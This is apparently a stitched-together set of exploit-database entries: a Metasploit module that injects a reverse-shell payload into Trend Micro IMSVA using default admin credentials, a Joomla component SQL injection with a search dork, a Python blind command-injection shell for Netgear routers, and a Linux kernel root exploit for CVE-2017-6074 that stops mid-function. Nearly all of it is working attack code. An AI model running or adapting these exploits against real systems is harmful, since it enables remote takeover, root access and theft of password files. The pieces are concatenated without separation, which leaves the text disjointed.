##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
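class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution',
      'Description'    => %q{
        This module exploits a command injection vulnerability in the Trend Micro
        IMSVA product. An authenticated user can execute a terminal command under
        the context of the web server user which is root. Besides, default installation
        of IMSVA comes with a default administrator credentials.
        saveCert.imss endpoint takes several user inputs and performs blacklisting.
        After that it use them as argument of predefined operating system command
        without proper sanitation. However,due to improper blacklisting rule it's possible to inject
        arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
        This module was tested against IMSVA 9.1-1600.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
        ],
      # The injected command runs as the web server user, which is root.
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          # Double quotes are blacklisted by the endpoint (see #exploit); the
          # slash is excluded as well, presumably by the same filter.
          'BadChars'    => "\x2f\x22"
        },
      'DefaultOptions' =>
        {
          'SSL'     => true,
          'payload' => 'python/meterpreter/reverse_tcp',
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        => [ ['Automatic', {}] ],
      'DisclosureDate' => 'Jan 15 2017',
      'DefaultTarget'  => 0
    ))

    # Defaults are the appliance's factory credentials (admin / imsva) on the
    # management port 8445 over TLS.
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
        OptString.new('USERNAME', [true, 'The username for authentication', 'admin']),
        OptString.new('PASSWORD', [true, 'The password for authentication', 'imsva']),
        Opt::RPORT(8445)
      ]
    )
  end

  # Authenticate against login.imss with USERNAME/PASSWORD.
  #
  # The password travels base64-encoded in the 'pwdfake' field (that is how the
  # web UI submits it). A successful login answers 302 and sets JSESSIONID.
  #
  # @return [String, nil] the JSESSIONID value, or nil when no session was issued
  # @raise fails the module (Failure::Unreachable) when the target does not
  #   answer, and (Failure::NoAccess) when the credentials are rejected
  def login
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']

    print_status("Attempting to login with #{user}:#{pass}")

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'login.imss'),
      'vars_post' => {
        'userid'  => user,
        'pwdfake' => Rex::Text.encode_base64(pass)
      }
    })

    # A nil response (timeout, connection refused) previously fell through to
    # res.get_cookies and died with NoMethodError instead of a clean failure.
    fail_with(Failure::Unreachable, "#{peer} - No response to the login request") unless res

    if res.body.include?("The user name or password you entered is invalid")
      fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
    end

    cookie = res.get_cookies
    if res.code == 302 && cookie.include?("JSESSIONID")
      # get_cookies renders "name=value; " pairs, hence the trailing ';' anchor.
      jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
      print_good("Authenticated as #{user}:#{pass}")
      return jsessionid
    end

    nil
  end

  # Log in, prime the session by visiting initCert.imss, then submit the
  # certificate form to saveCert.imss with the payload injected in commonName.
  def exploit
    jsessionid = login
    fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID') unless jsessionid

    # The servlet keeps the last visited page in the session (viewstate-like);
    # saveCert.imss crashes unless the form page initCert.imss was requested first.
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'initCert.imss'),
      'cookie' => "JSESSIONID=#{jsessionid}"
    })
    if res.nil? || !res.body.include?("Transport Layer Security")
      fail_with(Failure::Unknown, 'Unable to visit initCert.imss')
    end

    # One random token is reused as certificate name, state, locality, org, etc.
    r = Rex::Text.rand_text_alphanumeric(5)

    print_status("Delivering payload...")

    # commonName ends up inside a single-quoted argument of an OS command.
    # Double quotes are blacklisted, so the injection closes that argument,
    # runs `python -c '<payload>'` and comments out the remainder with '#'.
    # Any single quote inside the payload is rewritten as '\'' (quote,
    # backslash-quote, quote) so the shell keeps parsing. Thanks to @wvu!
    # The response is not inspected (the original did not either); the
    # payload's session is the success signal.
    send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'saveCert.imss'),
      'cookie'    => "JSESSIONID=#{jsessionid}",
      'vars_get'  => {
        'mode' => 0
      },
      'vars_post' => {
        'certName'     => r,
        'certType'     => 0,
        'keyLength'    => 2048,
        'countryCode'  => 'TR',
        'state'        => r,
        'locality'     => r,
        'org'          => r,
        'orgUnit'      => r,
        'commonName'   => "#{r}';python -c '#{payload.encoded.gsub("'", "'\\\\''")}' #",
        'emailAddress' => "#{r}@mail.com",
        'validDays'    => '',
        'id'           => '',
      }
    })
  end
end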
# # # # #
# Exploit Title: Joomla! Component Gnosis v1.1.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_gnosis
# Date: 25.02.2017
# Vendor Homepage: http://hypermodern.org/
# Software : https://extensions.joomla.org/extensions/extension/directory-a-documentation/glossary/gnosis/
# Demo: http://gnosis.hypermodern.org/index.php/dictionary
# Version: 1.1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_gnosis&view=tags&id=[SQL]
# # # # #
#!/usr/bin/python
#Provides access to default user account, privileges can be easily elevated by using either:
# - a kernel exploit (ex. memodipper was tested and it worked)
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)
#Pozdrawiam: Kornela, Komara i Sknerusa
import sys
import requests
#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
# HTTP basic-auth credentials sent with every request (factory defaults).
login, password = 'admin', 'password'
def main():
    """Entry point: needs the router IP as argv[1], then starts the blind shell loop."""
    if len(sys.argv) >= 2:
        spawnShell()
        return
    print("./netgearpwn_2.py <router ip>")
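def execute(cmd, timeout=None):
    """Run one command on the router via dnslookup.cgi (blind OS command injection).

    The CGI hands ``host_name`` to a shell; a benign hostname followed by ``;``
    gets past its basic input check, so ``cmd`` runs right after the lookup.
    Nothing is returned because the command output is never reflected back -
    confirm execution by its side effects (the original suggests ``reboot``).

    :param cmd: shell command line to run on the router (sent unmodified).
    :param timeout: optional ``requests`` timeout in seconds. With the default
        ``None`` the call blocks indefinitely, which matters here: a command
        that hangs, or a device that is rebooting, otherwise freezes the
        interactive loop forever.
    """
    url = "http://" + sys.argv[1] + "/dnslookup.cgi"
    data = {'host_name': "www.google.com; " + cmd, 'lookup': "Lookup"}
    try:
        requests.post(url, data=data, auth=(login, password), timeout=timeout)
    except requests.exceptions.RequestException as exc:
        # Keep the shell loop alive: a dropped connection is expected after
        # e.g. 'reboot' and is the only feedback this blind channel gives.
        print("[!] request failed: %s" % exc)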
def spawnShell():
    """Interactive prompt: every line typed is passed to execute() verbatim.

    The channel is blind (no output ever comes back), hence the prompt text;
    the loop has no exit of its own - only raw_input raising on EOF or a
    KeyboardInterrupt ends it.
    """
    print("Dropping a shell-like environment (blind OS injection)")
    print("To test it type 'reboot'")
    # raw_input never returns None, so this iterates until it raises.
    for line in iter(lambda: raw_input("[blind $] "), None):
        execute(line)
# Script entry point; main() returns None, so the exit status stays 0.
if __name__ == "__main__":
    sys.exit(main())
#2017-02-25 by SivertPL
#Tak, to ja.
//
// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471
//
// A proof-of-concept local root exploit for CVE-2017-6074.
// Includes a semireliable SMAP/SMEP bypass.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Usage:
// $ gcc poc.c -o pwn
// $ ./pwn
// [.] namespace sandbox setup successfully
// [.] disabling SMEP & SMAP
// [.] scheduling 0xffffffff81064550(0x406e0)
// [.] waiting for the timer to execute
// [.] done
// [.] SMEP & SMAP should be off now
// [.] getting root
// [.] executing 0x402043
// [.] done
// [.] should be root now
// [.] checking if we got root
// [+] got r00t ^_^
// [!] don't kill the exploit binary, the kernel will crash
// # cat /etc/shadow
// ...
// daemon:*:17149:0:99999:7:::
// bin:*:17149:0:99999:7:::
// sys:*:17149:0:99999:7:::
// sync:*:17149:0:99999:7:::
// games:*:17149:0:99999:7:::
// ...
//
// Andrey Konovalov <andreyknvl@gmail.com>
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <netinet/if_ether.h>
#define SMEP_SMAP_BYPASS 1
// Needed for local root.
#define COMMIT_CREDS 0xffffffff810a2840L
#define PREPARE_KERNEL_CRED 0xffffffff810a2c30L
#define SHINFO_OFFSET 1728
// Needed for SMEP_SMAP_BYPASS.
#define NATIVE_WRITE_CR4 0xffffffff81064550ul
#define CR4_DESIRED_VALUE 0x406e0ul
#define TIMER_OFFSET (728 + 48 + 104)
#define KMALLOC_PAD 128
#define KMALLOC_WARM 32
#define CATCH_FIRST 6
#define CATCH_AGAIN 16
#define CATCH_AGAIN_SMALL 64
// Port is incremented on each use, so every DCCP listener this process creates
// gets a fresh ::1 port.
static int port = 11000;

// Debug hook, compiled out (a no-op) in this build. The commented-out body
// shows the original intent: echo each phase label into /dev/kmsg so the
// user-space steps can be matched against kernel log output. If re-enabled,
// note the 32-byte buffer truncates the longer labels used below.
void debug(const char *msg) {
  (void)msg;
  /*
  char buffer[32];
  snprintf(&buffer[0], sizeof(buffer), "echo '%s' > /dev/kmsg\n", msg);
  system(buffer);
  */
}
// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
// User-space mirrors of the kernel structures sprayed into freed objects. Field
// types are fixed-width stand-ins chosen to reproduce the layout of the kernel
// named in the header (4.4.0-62-generic); the kernel type is noted per field.
struct ubuf_info {
  uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
  uint64_t ctx;      // void *
  uint64_t desc;     // unsigned long
};

struct skb_shared_info {
  uint8_t nr_frags;        // unsigned char
  uint8_t tx_flags;        // __u8
  uint16_t gso_size;       // unsigned short
  uint16_t gso_segs;       // unsigned short
  uint16_t gso_type;       // unsigned short
  uint64_t frag_list;      // struct sk_buff *
  uint64_t hwtstamps;      // struct skb_shared_hwtstamps
  uint32_t tskey;          // u32
  uint32_t ip6_frag_id;    // __be32
  uint32_t dataref;        // atomic_t
  uint64_t destructor_arg; // void *
  uint8_t frags[16][17];   // skb_frag_t frags[MAX_SKB_FRAGS];
};

// Fake ubuf_info referenced by the sprayed skb_shared_info. It lives in user
// memory, which is presumably why SMAP has to be switched off before
// kernel_exec() makes the kernel follow the pointer.
struct ubuf_info ui;

// Fill the 2048-byte buffer with a fake skb_shared_info at SHINFO_OFFSET:
// no fragments, every tx_flags bit set, and destructor_arg pointing at `ui`,
// whose callback is `func`. Everything else is zeroed.
void init_skb_buffer(char* buffer, void *func) {
  struct skb_shared_info *shinfo;

  memset(buffer, 0, 2048);
  shinfo = (struct skb_shared_info *)(buffer + SHINFO_OFFSET);
  shinfo->nr_frags = 0;
  shinfo->tx_flags = 0xff;
  shinfo->frag_list = 0;
  shinfo->destructor_arg = (uint64_t)&ui;
  ui.callback = (uint64_t)func;
}
// Mirror of the target kernel's struct timer_list (next/prev stand in for the
// hlist entry). A fake one is planted at TIMER_OFFSET inside a sprayed object
// so that, when the kernel runs the timer, it calls function(data).
struct timer_list {
  void *next;
  void *prev;
  unsigned long expires;
  void (*function)(unsigned long);
  unsigned long data;
  unsigned int flags;
  int slack;
};

// Zero the 2048-byte buffer and write a fake timer_list at TIMER_OFFSET whose
// handler is func and whose argument is arg. The expires/flags/slack values are
// the author's constants for this kernel build; presumably `expires` is chosen
// to already be due so the timer fires on its next run - confirm before porting.
void init_timer_buffer(char* buffer, void *func, unsigned long arg) {
  struct timer_list *fake;

  memset(buffer, 0, 2048);
  fake = (struct timer_list *)(buffer + TIMER_OFFSET);
  fake->next = NULL;
  fake->prev = NULL;
  fake->expires = 4294943360;
  fake->function = func;
  fake->data = arg;
  fake->flags = 1;
  fake->slack = -1;
}
// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
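// One trigger pair: a listening DCCP socket (s1) and a client (s2) on ::1.
struct dccp_handle {
  struct sockaddr_in6 sa; // ::1 / port the listener is bound to
  int s1;                 // listening DCCP socket
  int s2;                 // client socket, connected later in dccp_kmalloc_kfree()
};

// Prepare a trigger pair on ::1:port (the parameter shadows the file-level
// counter; callers pass port++). s1 is bound, put into LISTEN and given
// IPV6_RECVPKTINFO - presumably the ingredient named in the CVE-2017-6074
// advisory linked in the header; s2 is only created here. Exits the process
// on any failure (for instance when the kernel has no DCCP support).
//
// Fixes vs. the original: the second socket() result was checked through s1
// instead of s2, so a failure there went unnoticed; and the sockaddr casts
// remove the incompatible-pointer warning that recent GCC rejects by default.
void dccp_init(struct dccp_handle *handle, int port) {
  const struct sockaddr *addr = (const struct sockaddr *)&handle->sa;
  int optval = 8;

  handle->sa.sin6_family = AF_INET6;
  handle->sa.sin6_port = htons(port);
  inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr);
  handle->sa.sin6_flowinfo = 0;
  handle->sa.sin6_scope_id = 0;

  handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
  if (handle->s1 == -1) {
    perror("socket(SOCK_DCCP)");
    exit(EXIT_FAILURE);
  }
  if (bind(handle->s1, addr, sizeof(handle->sa)) != 0) {
    perror("bind()");
    exit(EXIT_FAILURE);
  }
  if (listen(handle->s1, 0x9) != 0) {
    perror("listen()");
    exit(EXIT_FAILURE);
  }
  if (setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO,
                 &optval, sizeof(optval)) != 0) {
    perror("setsockopt(IPV6_RECVPKTINFO)");
    exit(EXIT_FAILURE);
  }

  handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
  if (handle->s2 == -1) { // was: handle->s1
    perror("socket(SOCK_DCCP)");
    exit(EXIT_FAILURE);
  }
}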
// connect() the client to the listener. From the exploit's point of view this
// is "kmalloc + kfree": the kernel allocates the object of interest for the
// incoming request and releases it once (the first of the two frees).
// Exits on failure.
void dccp_kmalloc_kfree(struct dccp_handle *handle) {
  const struct sockaddr *addr = (const struct sockaddr *)&handle->sa;

  if (connect(handle->s2, addr, sizeof(handle->sa)) != 0) {
    perror("connect(SOCK_DCCP)");
    exit(EXIT_FAILURE);
  }
}
// shutdown() the listener: tearing down the pending request frees the same
// object a second time - the double free of CVE-2017-6074. Exits on failure.
void dccp_kfree_again(struct dccp_handle *handle) {
  if (shutdown(handle->s1, SHUT_RDWR) == 0)
    return;
  perror("shutdown(SOCK_DCCP)");
  exit(EXIT_FAILURE);
}
// Close both sockets of a pair. Kept for cleanup, but nothing in this file
// calls it: the trigger sockets are deliberately left open after the groom.
void dccp_destroy(struct dccp_handle *handle) {
  int fds[2] = { handle->s1, handle->s2 };
  int i;

  for (i = 0; i < 2; i++)
    close(fds[i]);
}
// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * *
// A unix-domain datagram socketpair used as a FIFO of kernel allocations: each
// send() on fds[0] makes the kernel hold one datagram (an allocation sized by
// the payload) and each recv() on fds[1] releases the oldest one - hence the
// "kmalloc"/"kfree" names of the helpers below.
struct udp_fifo_handle {
  int fds[2];
};

// Create the socketpair; exits on failure.
void udp_fifo_init(struct udp_fifo_handle* handle) {
  if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds) == 0)
    return;
  perror("socketpair()");
  exit(EXIT_FAILURE);
}
// Close both ends of the FIFO (releasing every queued datagram). Not called by
// this exploit; the sprays are intentionally left in place.
void udp_fifo_destroy(struct udp_fifo_handle* handle) {
  int i;

  for (i = 0; i < 2; i++)
    close(handle->fds[i]);
}
// Queue one 1536-byte datagram (the first 1536 bytes of buffer) on the FIFO:
// one kernel allocation whose contents the exploit controls. Exits unless the
// whole datagram was accepted.
void udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) {
  ssize_t sent = send(handle->fds[0], buffer, 1536, 0);

  if (sent != 1536) {
    perror("send()");
    exit(EXIT_FAILURE);
  }
}
// Queue a 128-byte datagram: a small allocation, presumably used to settle the
// smaller slab caches between the large sprays. The bytes sent are whatever is
// on the stack (as in the original); their content is irrelevant.
void udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) {
  char scratch[128];
  ssize_t sent = send(handle->fds[0], scratch, 128, 0);

  if (sent != 128) {
    perror("send()");
    exit(EXIT_FAILURE);
  }
}
// Dequeue the oldest 1536-byte datagram, freeing its kernel allocation. The
// data is read into a scratch buffer and discarded. Exits unless exactly 1536
// bytes came back (a short read would mean the FIFO holds something else).
void udp_fifo_kfree(struct udp_fifo_handle* handle) {
  char scratch[2048];
  ssize_t got = recv(handle->fds[1], scratch, 1536, 0);

  if (got != 1536) {
    perror("recv()");
    exit(EXIT_FAILURE);
  }
}
// Open an AF_PACKET datagram socket and return its descriptor. Nothing is ever
// sent on it: its kernel socket object is what reoccupies a freed slot, and
// timer_schedule() later attaches the RX ring whose retire timer the exploit
// hijacks. AF_PACKET needs CAP_NET_RAW, which the unprivileged user namespace
// from setup_sandbox() holds over its own network namespace. Exits on failure.
int timer_kmalloc() {
  int sock = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));

  if (sock < 0) {
    perror("socket(SOCK_DGRAM)");
    exit(EXIT_FAILURE);
  }
  return sock;
}
#define CONF_RING_FRAMES 1

// Attach a TPACKET_V3 receive ring (one block of one page-sized frame) to the
// AF_PACKET socket. tp_retire_blk_tov = timeout (milliseconds) arms the
// block-retire timer that lives inside the socket's ring state; that kernel
// timer_list is presumably the object at TIMER_OFFSET which kernel_exec_irq()
// overwrites with its fake copy, so `timeout` is effectively the delay until
// the hijacked function pointer is called from the timer softirq.
// PACKET_VERSION has to be set before PACKET_RX_RING (the version cannot be
// changed once a ring exists). Exits on any failure.
void timer_schedule(int handle, int timeout) {
  int optval = TPACKET_V3;
  int rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION,
                      &optval, sizeof(optval));
  if (rv != 0) {
    perror("setsockopt(PACKET_VERSION)");
    exit(EXIT_FAILURE);
  }
  struct tpacket_req3 tp;
  memset(&tp, 0, sizeof(tp));
  tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
  tp.tp_block_nr = 1;
  tp.tp_frame_size = getpagesize();
  tp.tp_frame_nr = CONF_RING_FRAMES;
  tp.tp_retire_blk_tov = timeout; // ms until the block is retired -> timer fires
  rv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING,
                  (void *)&tp, sizeof(tp));
  if (rv != 0) {
    perror("setsockopt(PACKET_RX_RING)");
    exit(EXIT_FAILURE);
  }
}
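// One sendmmsg() call crafted so that the kernel copies the 2048-byte control
// buffer into a freshly allocated object and frees it again when the call
// fails: the 1-byte "root" msg_name cannot be a valid address, so the call is
// expected to end with EINVAL. Any other failure is fatal.
//
// Fix vs. the original: the header is zeroed first. msg_iov and msg_flags were
// left indeterminate (only msg_iovlen = 0 made that survivable); with the
// memset the kernel sees a well-defined header and behaviour is unchanged.
void socket_sendmmsg(int sock, char *buffer) {
  struct mmsghdr msg[1];
  int rv;

  memset(msg, 0, sizeof(msg));
  msg[0].msg_hdr.msg_iovlen = 0;
  // Buffer to kmalloc.
  msg[0].msg_hdr.msg_control = buffer;
  msg[0].msg_hdr.msg_controllen = 2048;
  // Make sendmmsg exit early with EINVAL.
  msg[0].msg_hdr.msg_name = "root";
  msg[0].msg_hdr.msg_namelen = 1;

  rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);
  if (rv == -1 && errno != EINVAL) {
    perror("[-] sendmmsg()");
    exit(EXIT_FAILURE);
  }
}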
// Run socket_sendmmsg() on a throw-away unix datagram socketpair: net effect is
// one allocation holding `buffer` immediately followed by its free (the
// overwrite step of kernel_exec()). `port` is unused; it is part of the
// caller's calling pattern only. Only sock[0] is closed, exactly as in the
// original - closing sock[1] would free kernel objects in the middle of the
// groom, so that was deliberately not changed.
void sendmmsg_kmalloc_kfree(int port, char *buffer) {
  int pair[2];

  (void)port;
  if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, pair) != 0) {
    perror("socketpair()");
    exit(EXIT_FAILURE);
  }
  socket_sendmmsg(pair[0], buffer);
  close(pair[0]);
}
// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * *
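// Heap padding variant of dccp_init(): bind/listen on ::1:port, then connect a
// client to it right away, and leave everything open. The kernel objects this
// creates are never released, which is the point - they occupy slab slots so
// the real trigger lands where the groom expects. Exits on any failure.
//
// Fixes vs. the original: the second socket() result was checked through s1
// instead of s2, and the sockaddr casts remove the incompatible-pointer
// warning that recent GCC rejects by default.
void dccp_connect_pad(struct dccp_handle *handle, int port) {
  const struct sockaddr *addr = (const struct sockaddr *)&handle->sa;

  handle->sa.sin6_family = AF_INET6;
  handle->sa.sin6_port = htons(port);
  inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr);
  handle->sa.sin6_flowinfo = 0;
  handle->sa.sin6_scope_id = 0;

  handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
  if (handle->s1 == -1) {
    perror("socket(SOCK_DCCP)");
    exit(EXIT_FAILURE);
  }
  if (bind(handle->s1, addr, sizeof(handle->sa)) != 0) {
    perror("bind()");
    exit(EXIT_FAILURE);
  }
  if (listen(handle->s1, 0x9) != 0) {
    perror("listen()");
    exit(EXIT_FAILURE);
  }

  handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
  if (handle->s2 == -1) { // was: handle->s1
    perror("socket(SOCK_DCCP)");
    exit(EXIT_FAILURE);
  }
  if (connect(handle->s2, addr, sizeof(handle->sa)) != 0) {
    perror("connect(SOCK_DCCP)");
    exit(EXIT_FAILURE);
  }
}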
// Create four connected DCCP pairs on consecutive ports and keep them alive.
// The single handle is reused and never closed, so the descriptors leak on
// purpose: their kernel objects serve as slab padding.
void dccp_kmalloc_pad() {
  struct dccp_handle scratch;
  int n;

  for (n = 0; n < 4; n++)
    dccp_connect_pad(&scratch, port++);
}
// Open four AF_PACKET sockets as slab padding. The descriptors are discarded
// (not even checked) because they must simply stay open for the process
// lifetime; timer_kmalloc() is not used here so a failure is not fatal.
void timer_kmalloc_pad() {
  int n;

  for (n = 0; n < 4; n++)
    (void)socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
}
// Queue KMALLOC_PAD 1536-byte datagrams (16 per FIFO) and leave them queued as
// slab padding. The payload is uninitialised stack memory, as in the original;
// its content does not matter.
void udp_kmalloc_pad() {
  struct udp_fifo_handle fifos[16];
  char filler[2048];
  const int nfifos = KMALLOC_PAD / 16;
  int f, k;

  for (f = 0; f < nfifos; f++) {
    udp_fifo_init(&fifos[f]);
    for (k = 0; k < 16; k++)
      udp_fifo_kmalloc(&fifos[f], filler);
  }
}
// Run all three padding sprays (DCCP pairs, packet sockets, unix datagrams),
// in that order. The debug() calls are no-ops in this build.
void kmalloc_pad() {
  debug("dccp kmalloc pad");
  dccp_kmalloc_pad();

  debug("timer kmalloc pad");
  timer_kmalloc_pad();

  debug("udp kmalloc pad");
  udp_kmalloc_pad();
}
// Allocate KMALLOC_WARM 1536-byte datagrams and then release them all again,
// in the same order. Presumably this "warms" the slab so the following
// allocations are served from a freshly stocked per-CPU freelist. The FIFOs
// themselves stay open.
void udp_kmalloc_warm() {
  struct udp_fifo_handle fifos[16];
  char filler[2048];
  const int nfifos = KMALLOC_WARM / 16;
  int f, k;

  for (f = 0; f < nfifos; f++) {
    udp_fifo_init(&fifos[f]);
    for (k = 0; k < 16; k++)
      udp_fifo_kmalloc(&fifos[f], filler);
  }
  for (f = 0; f < nfifos; f++)
    for (k = 0; k < 16; k++)
      udp_fifo_kfree(&fifos[f]);
}
// Warm-up entry point; only the unix datagram warm-up is used.
void kmalloc_warm(void) { udp_kmalloc_warm(); }
// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * *
// Executes func(arg) from interrupt context multiple times.
//
// Outline, reconstructed from the debug() labels (counts and sizes are the
// author's empirical tuning for the 4.4.0-62 kernel named in the header):
//   1. pad and warm the slab caches (kmalloc_pad / kmalloc_warm);
//   2. dccp_kmalloc_kfree(): first free of the DCCP object; CATCH_FIRST
//      1536-byte datagrams queued on uh1 reclaim that memory;
//   3. dccp_kfree_again(): the double free; a second batch on uh2 reclaims the
//      same memory, so one chunk is now owned by both FIFOs at once;
//   4. draining uh1 and creating AF_PACKET sockets in its place, then
//      timer_schedule() arms each socket's ring-retire timer (500 ms) - the
//      timer_list that TIMER_OFFSET points at, presumably;
//   5. draining uh2 and refilling with `buffer` overwrites those sockets with
//      the fake timer_list from init_timer_buffer(); when the kernel's timer
//      softirq runs it, func(arg) executes in interrupt context.
// The small datagrams on uh4 between steps presumably keep the small caches
// stable. `dummy` is filled with 0xc3 - the x86 `ret` opcode - so a stray
// call into it returns harmlessly. Sleeps 1 s so the timers can fire.
void kernel_exec_irq(void *func, unsigned long arg) {
  int i;
  struct dccp_handle dh;
  struct udp_fifo_handle uh1, uh2, uh3, uh4;
  char dummy[2048];
  char buffer[2048];

  printf("[.] scheduling %p(%p)\n", func, (void *)arg);

  memset(&dummy[0], 0xc3, 2048);
  init_timer_buffer(&buffer[0], func, arg);

  udp_fifo_init(&uh1);
  udp_fifo_init(&uh2);
  udp_fifo_init(&uh3);
  udp_fifo_init(&uh4);

  debug("kmalloc pad");
  kmalloc_pad();
  debug("kmalloc warm");
  kmalloc_warm();

  // Step 2: first free, reclaimed by uh1.
  debug("dccp init");
  dccp_init(&dh, port++);
  debug("dccp kmalloc kfree");
  dccp_kmalloc_kfree(&dh);

  debug("catch 1");
  for (i = 0; i < CATCH_FIRST; i++)
    udp_fifo_kmalloc(&uh1, &dummy[0]);

  // Step 3: second free of the same object, reclaimed again by uh2.
  debug("dccp kfree again");
  dccp_kfree_again(&dh);

  debug("catch 2");
  for (i = 0; i < CATCH_FIRST; i++)
    udp_fifo_kmalloc(&uh2, &dummy[0]);

  // Step 4: swap uh1's datagrams for packet sockets, then arm their timers.
  int timers[CATCH_FIRST];

  debug("catch 1 -> timer");
  for (i = 0; i < CATCH_FIRST; i++) {
    udp_fifo_kfree(&uh1);
    timers[i] = timer_kmalloc();
  }

  debug("catch 1 small");
  for (i = 0; i < CATCH_AGAIN_SMALL; i++)
    udp_fifo_kmalloc_small(&uh4);

  debug("schedule timers");
  for (i = 0; i < CATCH_FIRST; i++)
    timer_schedule(timers[i], 500);

  // Step 5: uh2 still aliases the packet sockets; refilling it writes the fake
  // timer_list over the armed timers.
  debug("catch 2 -> overwrite timers");
  for (i = 0; i < CATCH_FIRST; i++) {
    udp_fifo_kfree(&uh2);
    udp_fifo_kmalloc(&uh3, &buffer[0]);
  }

  debug("catch 2 small");
  for (i = 0; i < CATCH_AGAIN_SMALL; i++)
    udp_fifo_kmalloc_small(&uh4);

  printf("[.] waiting for the timer to execute\n");
  debug("wait");
  sleep(1);
  printf("[.] done\n");
}
// Have the kernel call native_write_cr4(CR4_DESIRED_VALUE) from the timer
// softirq. The constant has bits 20 (SMEP) and 21 (SMAP) clear, so afterwards
// the kernel may execute and access user-space memory on the CPU this process
// is pinned to (setup_sandbox() pins it to CPU 0).
void disable_smep_smap() {
  void *write_cr4 = (void *)NATIVE_WRITE_CR4;

  printf("[.] disabling SMEP & SMAP\n");
  kernel_exec_irq(write_cr4, CR4_DESIRED_VALUE);
  printf("[.] SMEP & SMAP should be off now\n");
}
// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * *
// Executes func() from process context.
//
// Same double-free reclaim as kernel_exec_irq() (pad/warm, first free caught
// by uh1, second free caught by uh2), then:
//   4. draining uh1 and replacing each slot via sendmmsg_kmalloc_kfree()
//      writes `buffer` - the fake skb_shared_info from init_skb_buffer() -
//      into memory that uh2's datagrams still own;
//   5. draining uh2 frees those datagrams; releasing an skb whose shared info
//      has tx_flags 0xff and a destructor_arg pointing at the user-space `ui`
//      presumably makes the kernel call ui.callback, i.e. func, from within
//      the recv() syscall - process context, where commit_creds() may be used;
//   6. a final batch of CATCH_AGAIN datagrams on uh3 reoccupies the freed
//      memory ("catch 1 & 2").
// Nothing is released afterwards: the heap is left inconsistent, which is why
// check_root() warns not to kill the binary.
void kernel_exec(void *func) {
  int i;
  struct dccp_handle dh;
  struct udp_fifo_handle uh1, uh2, uh3;
  char dummy[2048];
  char buffer[2048];

  printf("[.] executing %p\n", func);

  memset(&dummy[0], 0, 2048);
  init_skb_buffer(&buffer[0], func);

  udp_fifo_init(&uh1);
  udp_fifo_init(&uh2);
  udp_fifo_init(&uh3);

  debug("kmalloc pad");
  kmalloc_pad();
  debug("kmalloc warm");
  kmalloc_warm();

  debug("dccp init");
  dccp_init(&dh, port++);
  debug("dccp kmalloc kfree");
  dccp_kmalloc_kfree(&dh);

  debug("catch 1");
  for (i = 0; i < CATCH_FIRST; i++)
